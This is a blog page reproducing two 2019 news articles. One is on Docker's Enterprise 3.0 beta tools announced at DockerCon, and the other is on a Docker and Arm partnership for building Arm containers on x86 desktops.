Docker updates focus on simplifying containerization for developers

Over the last five years, Docker has become synonymous with software containers, but that doesn’t mean every developer understands the technical details of building, managing and deploying them. At DockerCon this week, the company’s customer conference taking place in San Francisco, it announced new tools that have been designed to make it easier for developers, who might not be Docker experts, to work with containers.

As the technology has matured, the company has seen the market broaden, but in order to take advantage of that, it needs to provide a set of tools that make it easier to work with. “We’ve found that customers typically have a small cadre of Docker experts, but there are hundreds, if not thousands, of developers who also want to use Docker. And we reasoned, how can we help them get productive very, very quickly, without them having to become Docker experts,” Scott Johnston, chief product officer at Docker, told TechCrunch.

To that end, it announced a beta of Docker Enterprise 3.0, which includes several key components. For starters, Docker Desktop Enterprise lets IT set up a Docker environment with the kind of security and deployment templates that make sense for each customer. The developers can then pick the templates that make sense for their implementations, while conforming with compliance and governance rules in the company.

“These templates already have IT-approved container images, and have IT-approved configuration settings. And what that means is that IT can provide these templates through these visual tools that allow developers to move fast and choose the ones they want without having go back for approval,” Johnston explained.

The idea is to let the developers concentrate on building applications, and the templates provide all the Docker tooling pre-built and ready to go, so they don’t have to worry about all of that.

Another piece of this is Docker Applications, which allows developers to build complex containerized applications as a single package and deploy them to any infrastructure they wish — on-prem or in the cloud. Five years ago, when Docker really got started with containers, they were a simpler idea, often involving just a single one, but as developers broke down those larger applications into microservices, it created a new level of difficulty, especially for operations that had to deploy these increasingly large sets of application containers.

“Operations can now programmatically change the parameters for the containers, depending on the environments, without having to go in and change the application. So you can imagine that ability lowers the friction of having to manage all these files in the first place,” he said.

The final piece of that is the orchestration layer, and the popular way to handle that today is with Kubernetes. Docker has created its own flavor of Kubernetes, based on the open-source tool. Johnston says, as with the other two pieces, the goal here is to take a powerful tool like Kubernetes and reduce the overall complexity associated with running it, while making it fully compatible with a Docker environment.

For that, Docker announced Docker Kubernetes Service (DKS), which has been designed with Docker users in mind, including support for Docker Compose, a scripting tool that has been popular with Docker users. While you are free to use any flavor of Kubernetes you wish, Docker is offering DKS as a Docker-friendly version for developers.

All of these components have one thing in common besides being part of Docker Enterprise 3.0. They are trying to reduce the complexity associated with deploying and managing containers and to abstract away the most difficult parts, so that developers can concentrate on developing without having to worry about connecting to the technical underpinnings of building and deploying containers. At the same time, Docker is trying to make it easier for the operations team to manage it all. That is the goal, at least. In the end, DevOps teams will be the final judges of how well Docker has done, once these tools become generally available later this year.

The Docker Enterprise 3.0 beta will be available later this quarter.

Apr
24
2019
--

Docker developers can now build Arm containers on their desktops

Docker and Arm today announced a major new partnership that will see the two companies collaborate in bringing improved support for the Arm platform to Docker’s tools.

The main idea here is to make it easy for Docker developers to build their applications for the Arm platform right from their x86 desktops and then deploy them to the cloud (including the Arm-based AWS EC2 A1 instances), edge and IoT devices. Developers will be able to build their containers for Arm just like they do today, without the need for any cross-compilation.

This new capability, which will work for applications written in JavaScript/Node.js, Python, Java, C++, Ruby, .NET core, Go, Rust and PHP, will become available as a tech preview next week, when Docker hosts its annual North American developer conference in San Francisco.

Typically, developers would have to build the containers they want to run on the Arm platform on an Arm-based server. With this system, which is the first result of this new partnership, Docker essentially emulates an Arm chip on the PC for building these images.

“Overnight, the 2 million Docker developers that are out there can use the Docker commands they already know and become Arm developers,” Docker EVP of Strategic Alliances David Messina told me. “Docker, just like we’ve done many times over, has simplified and streamlined processes and made them simpler and accessible to developers. And in this case, we’re making x86 developers on their laptops Arm developers overnight.”

Given that cloud-based Arm servers like Amazon’s A1 instances are often significantly cheaper than x86 machines, users can achieve some immediate cost benefits by using this new system and running their containers on Arm.

For Docker, this partnership opens up new opportunities, especially in areas where Arm chips are already strong, including edge and IoT scenarios. Arm, similarly, is interested in strengthening its developer ecosystem by making it easier to develop for its platform. The easier it is to build apps for the platform, the more likely developers are to then run them on servers that feature chips from Arm’s partners.

“Arm’s perspective on the infrastructure really spans all the way from the endpoint, all the way through the edge to the cloud data center, because we are one of the few companies that have a presence all the way through that entire path,” Mohamed Awad, Arm’s VP of Marketing, Infrastructure Line of Business, said. “It’s that perspective that drove us to make sure that we engage Docker in a meaningful way and have a meaningful relationship with them. We are seeing compute and the infrastructure sort of transforming itself right now from the old model of centralized compute, general purpose architecture, to a more distributed and more heterogeneous compute system.”

Developers, however, Awad rightly noted, don’t want to have to deal with this complexity, yet they also increasingly need to ensure that their applications run on a wide variety of platforms and that they can move them around as needed. “For us, this is about enabling developers and freeing them from lock-in on any particular area and allowing them to choose the right compute for the right job that is the most efficient for them,” Awad said.

Messina noted that the promise of Docker has long been to remove the dependence of applications from the infrastructure on which they run. Adding Arm support simply extends this promise to an additional platform. He also stressed that the work on this was driven by the company’s enterprise customers. These are the users who have already set up their systems for cloud-native development with Docker’s tools — at least for their x86 development. Those customers are now looking at developing for their edge devices, too, and that often means developing for Arm-based devices.

Awad and Messina both stressed that developers really don’t have to learn anything new to make this work. All of the usual Docker commands will just work.

Powered by WordPress | Theme: Aeros 2.0 by TheBuckmaker.com